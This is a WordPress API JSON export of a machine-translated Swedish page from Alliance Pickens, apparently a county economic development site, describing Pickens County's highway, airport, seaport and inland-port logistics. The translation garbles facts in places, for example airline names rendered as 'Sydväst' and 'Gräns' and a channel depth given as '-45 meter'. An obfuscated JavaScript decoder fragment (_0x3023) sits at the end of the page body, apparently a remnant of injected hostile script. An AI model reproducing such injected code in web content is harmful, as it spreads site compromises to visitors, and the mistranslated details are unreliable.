{"id":8482,"date":"2020-10-28T16:08:11","date_gmt":"2020-10-28T16:08:11","guid":{"rendered":"http:\/\/alliancepickens.com\/affarsklimat\/marknadstilltrade\/"},"modified":"2020-12-09T20:36:46","modified_gmt":"2020-12-09T20:36:46","slug":"marknadstilltrade","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/","title":{"rendered":"Marknadstilltr\u00e4de"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Logistik<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4944\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #03795b\">Motorv\u00e4g Anslutningar<\/span><\/strong><\/h4>\n<p>Bel\u00e4get halvv\u00e4gs mellan Charlotte, North Carolina och Atlanta, Georgia, erbjuder Pickens County.South Carolina.USA lokala f\u00f6retag ett strategiskt l\u00e4ge fr\u00e5n vilket de kan betj\u00e4na sina kunder i syd\u00f6stra USA och d\u00e4refter.<\/p>\n<p>P\u00e5 gr\u00e4nsen till I-85, pickens County st\u00e5tar med 228 miles av statliga prim\u00e4ra v\u00e4gar.<\/p>\n<ul>\n<li>I-85 S\u00f6der till Georgia (till I-20 och I-75) och Alabama (till I-65)<\/li>\n<li>I-85 North till North Carolina (till I-77 och I-40) och Virginia (till I-95)<\/li>\n<li>I-26 \u00d6st till I-20, I-77, och I-95<\/li>\n<li>I-26 \u00d6st till Charleston, SC och hamnen i Charleston<\/li>\n<li>I-26 V\u00e4st till Charlotte, NC (till I-40)<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;I det h\u00e4r avsnittet&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4945\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #8a8a8a\">Flygservice  <\/span><\/strong><\/h4>\n<p>Den internationella flygplatsen Greenville-Spartanburg (GSP) ligger endast 45 minuters bilresa bort. Den Pickens County Airport (LQK), en allm\u00e4nflyg flygplats, har en 5002-fots bana (Bana 23). Med en nybyggd terminalbyggnad som \u00e5terspeglar bergscharmen i Blue Ridge Mountains, \u00e4r denna flygplats perfekt f\u00f6r aff\u00e4rs- och fritidsflyg.[\/vc_column_text][vc_row_inner el_class=&#8221;airservice&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>Atlanta, Georgia \u2013 ATL \u2013 Endeavor Air, SkyWest Airlines, Sydv\u00e4st, Delta<\/li>\n<li>Charlotte, North Carolina \u2013 CLT \u2013 Amerikansk<\/li>\n<li>Chicago, Illinois \u2013 ORD \u2013 ExpressJet Airlines LLC, Envoy Air, Amerikanska, SkyWest Airlines<\/li>\n<li>Dallas\/Fort Worth, Texas \u2013 DFW \u2013 Amerikansk<\/li>\n<li>Denver, Colorado \u2013 DEN \u2013 Gr\u00e4ns<\/li>\n<li>Detroit, Michigan \u2013 DTW \u2013 GoJet Airlines LLC \/ United Express, Endeavor Air, SkyWest Airlines, Delta<\/li>\n<li>Fort Lauderdale, Florida \u2013 FLL \u2013 Allegiant Air<\/li>\n<li>Houston, Texas \u2013 IAH \u2013 ExpressJet Airlines LLC, Mesa Airlines<\/li>\n<li>Miami, Florida \u2013 MIA \u2013 S\u00e4ndebud Air<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>New York, New York \u2013 LGA \u2013 Endeavor Air, SkyWest Airlines<\/li>\n<li>Newark, New Jersey \u2013 EWR \u2013 ExpressJet Airlines LLC, United Express<\/li>\n<li>Philadelphia, Pennsylvania \u2013 PHL \u2013 amerikansk<\/li>\n<li>San Jose, Kalifornien \u2013 SJC \u2013 Delta, Sun Country Airlines \/ MN Airlines, Atlas Air, Amerikansk<\/li>\n<li>Sanford, Florida \u2013 SFB \u2013 Allegiant Air<\/li>\n<li>Petersburg, Florida \u2013 PIE \u2013 Allegiant Air<\/li>\n<li>Tampa, Florida \u2013 TPA \u2013 Gr\u00e4ns<\/li>\n<li>Washington, Virginia \u2013 DCA \u2013 Amerikansk<\/li>\n<li>Washington, Virginia \u2013 IAD \u2013 Delta, ExpressJet Airlines LLC, United, Mesa Airlines, Amerikanska<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4946\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #1d2c68\">Tilltr\u00e4de till marina hamn<\/span><\/strong><\/h4>\n<p>Hamnen i Charleston \u00e4r en djuphavshamn med inre hamnkanaler inspelning -45 meter, vilket g\u00f6r den djupaste i s\u00f6dra Atlanten. De ekonomiska effekterna av South Carolina hamnar \u00e4r betydande. Mer \u00e4n 280.000 jobb och $ 45 miljarder tillskrivs driften av hamnarna varje \u00e5r.[\/vc_column_text][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4947 size-full\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"scports lignright wp-image-4956 size-full\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports.jpg\" alt=\"\" width=\"378\" height=\"314\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports.jpg 378w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports-300x249.jpg 300w\" sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><span style=\"color: #5dc9ae\">Inlandshamnar<\/span><\/strong><\/h4>\n<p>South Carolina&#8217;s Inland Port Greer, som ligger lite \u00f6ver femtio (50) minuter fr\u00e5n Pickens County, \u00e4r en innovativ, intermodal j\u00e4rnv\u00e4gsanl\u00e4ggning som ger f\u00f6rdelarna med en kustn\u00e4ra marina terminal m\u00e5nga miles in\u00e5t landet. South Carolina Ports Authority \u00e4ger och driver dessa anl\u00e4ggningar som g\u00f6r det m\u00f6jligt f\u00f6r last\u00e4gare att minimera sina inlandskostnader samtidigt \u00f6ka flexibiliteten och effektiviteten, och f\u00f6rverkliga besparingar p\u00e5 r\u00f6rliga kostnader s\u00e5som container per diems, chassi hyra och demurrage. F\u00f6r f\u00f6retag som \u00e4r intresserade av att s\u00e4nka sina koldioxidutsl\u00e4pp, dessa anl\u00e4ggningar till\u00e5ter avlastare att minska koldioxidutsl\u00e4ppen upp till 80% j\u00e4mf\u00f6rt med alla lastbilsservice.<\/p>\n<p>Timing \u00e4r allt. En s\u00e4rskild Norfolk Southern t\u00e5g g\u00e5r sex (6) dagar per vecka och ger \u00f6vernattning service i b\u00e5da riktningarna till och fr\u00e5n Charleston hamnen. Inlandsportens Port Greer ger dig o\u00f6vertr\u00e4ffad flexibilitet och kontroll med tillg\u00e5ng p\u00e5 containrar n\u00e4sta dag, som fungerar f\u00f6r tillverkare som k\u00f6r sn\u00e4va produktionslinjer.  <a href=\"http:\/\/scspa.com\/wp-content\/uploads\/inland-port-greer-qr.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">L\u00e4s mer<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">L\u00e4s mer om F\u00f6retagsklimat<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;18&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Redo att s\u00e4tta ig\u00e5ng?<\/h1>\n<h3>Vi ser fram emot att f\u00e5 tala med er!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/sv\/om-oss\/#contact_directions\">Kontakta v\u00e5rt team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistik [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Motorv\u00e4g Anslutningar Bel\u00e4get halvv\u00e4gs mellan Charlotte, North Carolina och Atlanta, Georgia, erbjuder Pickens County.South Carolina.USA lokala f\u00f6retag ett strategiskt l\u00e4ge fr\u00e5n vilket de kan betj\u00e4na sina kunder i syd\u00f6stra USA och d\u00e4refter. P\u00e5 gr\u00e4nsen till I-85, pickens County st\u00e5tar med 228 miles av statliga prim\u00e4ra v\u00e4gar. I-85 S\u00f6der till&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":7826,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8482","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Marknadstilltr\u00e4de - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Marknadstilltr\u00e4de - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistik [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Motorv\u00e4g Anslutningar Bel\u00e4get halvv\u00e4gs mellan Charlotte, North Carolina och Atlanta, Georgia, erbjuder Pickens County.South Carolina.USA lokala f\u00f6retag ett strategiskt l\u00e4ge fr\u00e5n vilket de kan betj\u00e4na sina kunder i syd\u00f6stra USA och d\u00e4refter. P\u00e5 gr\u00e4nsen till I-85, pickens County st\u00e5tar med 228 miles av statliga prim\u00e4ra v\u00e4gar. I-85 S\u00f6der till&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:36:46+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/\",\"name\":\"Marknadstilltr\u00e4de - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\",\"datePublished\":\"2020-10-28T16:08:11+00:00\",\"dateModified\":\"2020-12-09T20:36:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/marknadstilltrade\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aff\u00e4rsklimat\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/affarsklimat\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Marknadstilltr\u00e4de\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Marknadstilltr\u00e4de - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/","og_locale":"sv_SE","og_type":"article","og_title":"Marknadstilltr\u00e4de - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistik [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Motorv\u00e4g Anslutningar Bel\u00e4get halvv\u00e4gs mellan Charlotte, North Carolina och Atlanta, Georgia, erbjuder Pickens County.South Carolina.USA lokala f\u00f6retag ett strategiskt l\u00e4ge fr\u00e5n vilket de kan betj\u00e4na sina kunder i syd\u00f6stra USA och d\u00e4refter. P\u00e5 gr\u00e4nsen till I-85, pickens County st\u00e5tar med 228 miles av statliga prim\u00e4ra v\u00e4gar. I-85 S\u00f6der till&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:36:46+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/","url":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/","name":"Marknadstilltr\u00e4de - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","datePublished":"2020-10-28T16:08:11+00:00","dateModified":"2020-12-09T20:36:46+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/"]}]},{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/marknadstilltrade\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Aff\u00e4rsklimat","item":"https:\/\/alliancepickens.com\/sv\/affarsklimat\/"},{"@type":"ListItem","position":3,"name":"Marknadstilltr\u00e4de"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/8482","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=8482"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/8482\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/7826"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=8482"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}